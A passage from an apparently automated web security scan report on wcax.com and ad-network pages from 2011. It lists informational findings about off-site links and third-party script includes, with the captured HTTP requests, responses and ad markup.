<?xml version="1.0" encoding="utf-8"?><DEFAULT><CURRENT><TYPE>S</TYPE><ID>503137</ID><STATUS>L</STATUS><owner><affiliateno>183</affiliateno><affiliatename>WCAX</affiliatename><baseurl>www.wcax.com</ba
...[SNIP]...
<span style="white-space:nowrap;"><script src="http://ads.adbrite.com/mb/text_group.php?sid=640921&zs=3436385f3630" type="text/javascript"></script><!--
--><a target="_top" href="http://www.adbrite.com/mb/commerce/purchase_form.php?opid=640921&afsid=1"><img src="http://files.adbrite.com/mb/images/adbrite-your-ad-here-banner.gif" style="background-color:#CCCCCC;border:none;padding:0;margin:0;" alt="Your Ad Here" width="11" height="60" border="0" /></a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<br>(to download, click <a class='Help' href='http://www.microsoft.com/windows/windowsmedia/download/default.asp' target='_blank'>here</a>
...[SNIP]...
</script><script language='JavaScript' src='http://www.google.com/afsonline/show_afs_ads.js'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://content.worldnow.com/global/interface/google/googleads.js?ver=200901240400'></script><link rel='stylesheet' type='text/css' href='http://content.worldnow.com/global/interface/google/googleads.css?ver=200901240400'>]]>
...[SNIP]...
</script><script type='text/javascript' src='http://content.worldnow.com/global/interface/google/googlecsearch.js'></script>
...[SNIP]...
</script><script language="JavaScript" src="http://www.google.com/afsonline/show_afs_ads.js"></script>
...[SNIP]...
</script>
               <script type='text/javascript' src='http://content.worldnow.com/global/interface/httprequest/httprequest.js?ver=200711031508'></script><script type='text/javascript' src='http://content.worldnow.com/global/interface/google/googleads.js?ver=200711031508'></script><link rel='stylesheet' type='text/css' href='http://content.worldnow.com/global/interface/google/googleads.css?ver=200711031508'>]]>
...[SNIP]...
</script>
               <script type='text/javascript' src='http://content.worldnow.com/global/interface/httprequest/httprequest.js?ver=200711031508'></script><script type='text/javascript' src='http://content.worldnow.com/global/interface/google/googleads.js?ver=200711031508'></script><link rel='stylesheet' type='text/css' href='http://content.worldnow.com/global/interface/google/googleads.css?ver=200711031508'>]]>
...[SNIP]...
</script><script language='JavaScript' src='http://www.google.com/afsonline/show_afs_ads.js'></script>
...[SNIP]...
10.206. http://www.wcax.com/global/link.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /global/link.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /global/link.asp?L=104054&function=manageprofile&mode=create&referrer=http%3A//www.wcax.com/Global/link.asp%3FL%3D398823 HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; __qca=P0-1094680209-1302352442492; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352689361:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: IIS10
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: CACHE_DB
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 25781
Cache-Control: private, max-age=900
Date: Sat, 09 Apr 2011 12:38:19 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 25781

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head>
<META http-equiv="Content-Type" content="text/html">
<title>Registrati
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/analytics/sdctag.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/globals.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/jq.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/container-e/core.js?ver=201011111600"></script>
<script type="text/javascript" language="JavaScript1.3" src="http://content.worldnow.com/global/tools/video/VideoFunctions.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnadmanager.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnvideo.js?ver=201011111600"></script>
<link type="text/css" rel="stylesheet" media="all" href="http://content.worldnow.com/global/interface/container-e/core.css?ver=201011111600">
<link type="text/css" rel="stylesheet" media="all" href="http://WCAX.images.worldnow.com/interface/css/container-e.css?ver=2011-03-26%2003%3A55%3A56">
<!--[if lt IE 6]>
...[SNIP]...
<![endif]-->
<link rel="stylesheet" type="text/css" href="http://content.worldnow.com/global/interface/integration/jquery.fancybox-1.3.1.css" media="screen">
<!--MENU INCLUDES-->
<link rel="stylesheet" href="http://content.worldnow.com/global/interface/menu/menu.css?ver=201011111600" type="text/css"><style type="text/css">
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/menu/menu.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/integration/thirdparty.js?ver=201011111600"></script>
...[SNIP]...
<label for="WNSearchBox-headertop-google_cs">WEB SEARCH BY <img src='http://WCAX.images.worldnow.com/global/images/google/google-logo.gif' alt='Google' class='wnSearchBoxLabelImg-google'></label>
...[SNIP]...
<div id="WNBranding"><img id="WNBrandingImage" usemap="#wnBrandingMap" alt="" border="0" src="http://WCAX.images.worldnow.com/images/static/hdr/hdr_branding.jpg"><map name="wnBrandingMap">
...[SNIP]...
<a href="/Global/category.asp?C=18195"><img src="http://WCAX.images.worldnow.com/images/272499_G.gif" width="37" height="29" border="0" alt="Home WCAX.com" title="Home WCAX.com" onsrc="http://WCAX.images.worldnow.com/images/272500_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18197"><img src="http://WCAX.images.worldnow.com/images/272501_G.gif" width="34" height="29" border="0" alt="Local News" title="Local News" onsrc="http://WCAX.images.worldnow.com/images/272502_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18196"><img src="http://WCAX.images.worldnow.com/images/272503_G.gif" width="54" height="29" border="0" alt="Weather" title="Weather" onsrc="http://WCAX.images.worldnow.com/images/272504_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18198"><img src="http://WCAX.images.worldnow.com/images/272505_G.gif" width="43" height="29" border="0" alt="Sports" title="Sports" onsrc="http://WCAX.images.worldnow.com/images/272506_G.gif"></a>
...[SNIP]...
<a href="/Global/link.asp?L=408799"><img src="http://WCAX.images.worldnow.com/images/272508_G.gif" width="74" height="29" border="0" alt="WCAX Vermontopia Community Calendar" title="WCAX Vermontopia Community Calendar" onsrc="http://WCAX.images.worldnow.com/images/272509_G.gif"></a>
...[SNIP]...
<a href="javascript:OpenWin('http://www.vermontopia.com||height=768,width=1024,location=yes,resizable=yes,scrollbars=yes,toolbar=yes');"><img src="http://WCAX.images.worldnow.com/images/272510_G.gif" width="82" height="29" border="0" alt="Vermontopia.com" title="Vermontopia.com" onsrc="http://WCAX.images.worldnow.com/images/272511_G.gif"></a>
...[SNIP]...
<a href="/Global/link.asp?L=398823"><img src="http://WCAX.images.worldnow.com/images/272512_G.gif" width="74" height="29" border="0" alt="WCAX Promotions" title="WCAX Promotions" onsrc="http://WCAX.images.worldnow.com/images/272513_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=68446"><img src="http://WCAX.images.worldnow.com/images/272514_G.gif" width="54" height="29" border="0" alt="LIFESTYLE" title="LIFESTYLE" onsrc="http://WCAX.images.worldnow.com/images/272516_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18836"><img src="http://WCAX.images.worldnow.com/images/272517_G.gif" width="60" height="29" border="0" alt="Contact Us" title="Contact Us" onsrc="http://WCAX.images.worldnow.com/images/272518_G.gif"></a>
...[SNIP]...
</div>
<iframe id="spinner" scrolling="no" frameborder="0" marginwidth="0" marginheight="0" src="http://WCAX.images.worldnow.com/global/images/pm/loading.gif"></iframe>
...[SNIP]...
<div id="WNCopyright"><a href="http://www.worldnow.com" target="_blank"><img src="http://WCAX.images.worldnow.com/images/static/container-e/wn_powerby.gif" alt="Powered by WorldNow" border="0"></a>
...[SNIP]...
<noscript><img src="http://analytics.worldnow.com/dcsuhch2hzersfqyzf2de5tct_4d8l/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.0.0&amp;WT.sp=WCAX&amp;dcssip=www.wcax.com" name="DCSIMG" width="1" height="1" border="0" alt=""></noscript>
...[SNIP]...
<!--Page Include: BODY--><script type="text/javascript" src="http://tags.crwdcntrl.net/c/492/cc.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/global_zoom.js?ver=201011111600"></script>
...[SNIP]...
10.207. http://y.cdn.adblade.com/imps.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://y.cdn.adblade.com
Path:   /imps.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html, HTTP/1.1
Host: y.cdn.adblade.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAzczMzMzM5D.NzMzMzMzkPwAAAAAAAAAAAACAwd-20z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABqMpwLvyHsCa7x.O.NrHwpEVGlz2pya-BtpgD9AAAAAA==,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,Z%3D300x250%26s%3D1209091%26_salt%3D2946263302%26B%3D10%26r%3D0,e860ecda-6462-11e0-9f69-003048d6d894
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-type: text/html
Date: Mon, 11 Apr 2011 17:41:19 GMT
Expires: Mon, 11 Apr 2011 17:41:19 GMT
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Pragma: no-cache
Server: lighttpd/1.4.18
Set-Cookie: __tuid=2298699369328420558; expires=Sat, 09-Apr-2016 17:41:19 GMT; path=/; domain=.adblade.com
Set-Cookie: __impt=1302543679.804242756343; expires=Tue, 12-Apr-2011 17:41:19 GMT; path=/
X-Powered-By: PHP/5.2.8
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Content-Length: 14514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
<td class="zoneSsponsoredText193" ><a href="http://www.smarterlifestyles.com/" target="_blank"><img style="border:0;" height="12" alt="SmarterLifestyles" title="SmarterLifestyles" src="http://static.cdn.adblade.com/img/smarterlifestyles-logo.gif"/>
...[SNIP]...
<td id="adImage" rowspan="2" class="adImage1_193" valign="top" align="left">
<a href="http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,http://www.smarterlifestyles.com/2010/06/01/the-advantages-of-buying-penny-stocks/?fc_id=14694&fc_app_id=3993" target="_blank">
<img src="http://static.cdn.adblade.com/banners/images/80x60/6073_4c066ab0e8465.jpg" border="0" />
...[SNIP]...
<div class="descriptionScrool1_193">
<a class="adDescription1_193" id="adDescription0_0" href="http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,http://www.smarterlifestyles.com/2010/06/01/the-advantages-of-buying-penny-stocks/?fc_id=14694&fc_app_id=3993" target="_blank">
Santa Monica : Discover the advantages of buying penny stocks...</a><br/>
<a class="adDisplayName1_193" href="http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,http://www.smarterlifestyles.com/2010/06/01/the-advantages-of-buying-penny-stocks/?fc_id=14694&fc_app_id=3993"> Penny Stocks Expert</a>
...[SNIP]...
<td id="adImage" rowspan="2" class="adImage1_193" valign="top" align="left">
<a href="http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,http://www.smarterlifestyles.com/2010/10/01/discover-how-to-relieve-your-stress/?fc_id=24626&fc_app_id=3993" target="_blank">
<img src="http://static.cdn.adblade.com/banners/images/80x60/4d6546515c13f.jpg" border="0" />
...[SNIP]...
<div class="descriptionScrool1_193">
<a class="adDescription1_193" id="adDescription1_0" href="http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,http://www.smarterlifestyles.com/2010/10/01/discover-how-to-relieve-your-stress/?fc_id=24626&fc_app_id=3993" target="_blank">
Finally! An all natural way to beat stress and anxiety for good...</a><br/>
<a class="adDisplayName1_193" href="http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,http://www.smarterlifestyles.com/2010/10/01/discover-how-to-relieve-your-stress/?fc_id=24626&fc_app_id=3993"> Lumiday</a>
...[SNIP]...
<td id="adImage" rowspan="2" class="adImage1_193" valign="top" align="left">
<a href="http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,http://www.smarterlifestyles.com/2011/02/24/how-to-cut-thousands-off-of-your-credit-card-debt/?fc_id=24959&fc_app_id=3993" target="_blank">
<img src="http://static.cdn.adblade.com/banners/images/80x60/1503_4d6eb668e7057.jpg" border="0" />
...[SNIP]...
<div class="descriptionScrool1_193">
<a class="adDescription1_193" id="adDescription2_0" href="http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,http://www.smarterlifestyles.com/2011/02/24/how-to-cut-thousands-off-of-your-credit-card-debt/?fc_id=24959&fc_app_id=3993" target="_blank">
Find out how to cut thousands off your credit card debt...</a><br/>
<a class="adDisplayName1_193" href="http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,http://www.smarterlifestyles.com/2011/02/24/how-to-cut-thousands-off-of-your-credit-card-debt/?fc_id=24959&fc_app_id=3993"> AFS</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=8&c2=6864322&c3=&c4=&c5=&c6=&c10=&c15=&cj=1" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-b8GPCpJxfqYm2.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
<!-- End Quantcast tag -->
<script type="text/javascript" src="http://pixel.adsafeprotected.com/jspix?anId=140&pubId=5079&campId=3993"></script>
<noscript><img src="http://pixel.adsafeprotected.com?anId=140&pubId=5079&campId=3993"></noscript>
...[SNIP]...
11. Cross-domain script include  previous  next
There are 71 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

11.1. http://a.rfihub.com/sed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /sed

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf= HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=8163847123&w=300&lmt=1302370522&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18836&dt=1302352522769&bpp=3&shv=r20110330&jsv=r20110321-2&correlator=1302352522793&frm=0&adk=2815960337&ga_vid=983270927.1302352523&ga_sid=1302352523&ga_hid=1867116075&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18963&fu=0&ifi=1&dtd=103&xpc=mxzeQN3016&p=http%3A//www.wcax.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
